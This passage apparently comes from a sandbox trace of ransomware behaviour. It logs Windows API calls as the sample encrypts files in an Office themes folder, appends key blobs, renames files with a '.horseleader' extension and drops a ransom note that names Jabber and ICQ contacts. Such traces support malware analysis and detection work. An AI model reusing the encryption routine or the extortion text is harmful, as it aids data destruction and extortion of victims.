(in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\.") returned 70 [0248.258] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.258] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.258] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.258] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\..") returned 71 [0248.258] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.258] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.258] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x623, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.259] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.259] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0248.259] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.259] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.259] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.259] lstrlenW (lpString=".testttjffg") returned 11 [0248.259] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.261] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0248.261] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.261] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1571) returned 1 [0248.261] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x623, lpOverlapped=0x0) returned 1 [0248.263] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x623, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x623, lpOverlapped=0x0) returned 1 [0248.263] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.263] CloseHandle (hObject=0x1a4) returned 1 [0248.264] GetProcessHeap () returned 0x780000 [0248.264] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.264] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.horseleader") returned 92 [0248.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.horseleader")) returned 1 [0248.265] GetProcessHeap () returned 0x780000 [0248.265] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.265] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x75da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.265] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.265] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0248.265] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.265] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.265] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.265] lstrlenW (lpString=".testttjffg") returned 11 [0248.265] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.265] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.265] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0248.267] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.267] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=30170) returned 1 [0248.267] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.270] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.270] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x25da, lpOverlapped=0x0) returned 1 [0248.271] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffda26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x25da, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x25da, lpOverlapped=0x0) returned 1 [0248.271] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.271] CloseHandle (hObject=0x1a4) returned 1 [0248.271] GetProcessHeap () returned 0x780000 [0248.271] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.horseleader") returned 93 [0248.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.horseleader")) returned 1 [0248.275] GetProcessHeap () returned 0x780000 [0248.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.275] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d2a200, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x37d2a200, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbfc6, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.ELM", cAlternateFileName="")) returned 1 [0248.275] lstrcmpiW (lpString1="WATERMAR.ELM", lpString2="Windows") returned -1 [0248.276] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0248.276] StrStrIW (lpFirst="WATERMAR.ELM", lpSrch=".horseleader") returned 0x0 [0248.276] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.276] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="_uninstalling_.png") returned 1 [0248.276] lstrlenW (lpString=".testttjffg") returned 11 [0248.276] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM", lpSrch=".testttjffg") returned 0x0 [0248.276] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.276] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0248.277] StrStrW (lpFirst="WATERMAR.ELM", lpSrch=".txt") returned 0x0 [0248.277] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49094) returned 1 [0248.277] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.279] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.281] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fc6, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe03a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1fc6, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fc6, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.282] CloseHandle (hObject=0x1a4) returned 1 [0248.282] GetProcessHeap () returned 0x780000 [0248.282] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM.horseleader") returned 93 [0248.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm.horseleader")) returned 1 [0248.283] GetProcessHeap () returned 0x780000 [0248.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.INF", cAlternateFileName="")) returned 1 [0248.283] lstrcmpiW (lpString1="WATERMAR.INF", lpString2="Windows") returned -1 [0248.284] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0248.284] StrStrIW (lpFirst="WATERMAR.INF", lpSrch=".horseleader") returned 0x0 [0248.284] lstrcmpW (lpString1="WATERMAR.INF", lpString2="#Decrypt#.txt") returned 1 [0248.284] lstrcmpW (lpString1="WATERMAR.INF", lpString2="_uninstalling_.png") returned 1 [0248.284] lstrlenW (lpString=".testttjffg") returned 11 [0248.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF", lpSrch=".testttjffg") returned 0x0 [0248.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0248.285] StrStrW (lpFirst="WATERMAR.INF", lpSrch=".txt") returned 0x0 [0248.285] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=683) returned 1 [0248.285] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2ab, lpOverlapped=0x0) returned 1 [0248.286] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2ab, lpOverlapped=0x0) returned 1 [0248.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.287] CloseHandle (hObject=0x1a4) returned 1 [0248.288] GetProcessHeap () returned 0x780000 [0248.288] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.288] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF.horseleader") returned 93 [0248.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf.horseleader")) returned 1 [0248.289] GetProcessHeap () returned 0x780000 [0248.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.289] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.INF", cAlternateFileName="")) returned 0 [0248.289] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.289] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\#Decrypt#.txt") returned 82 [0248.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.290] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.290] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.291] lstrlenA 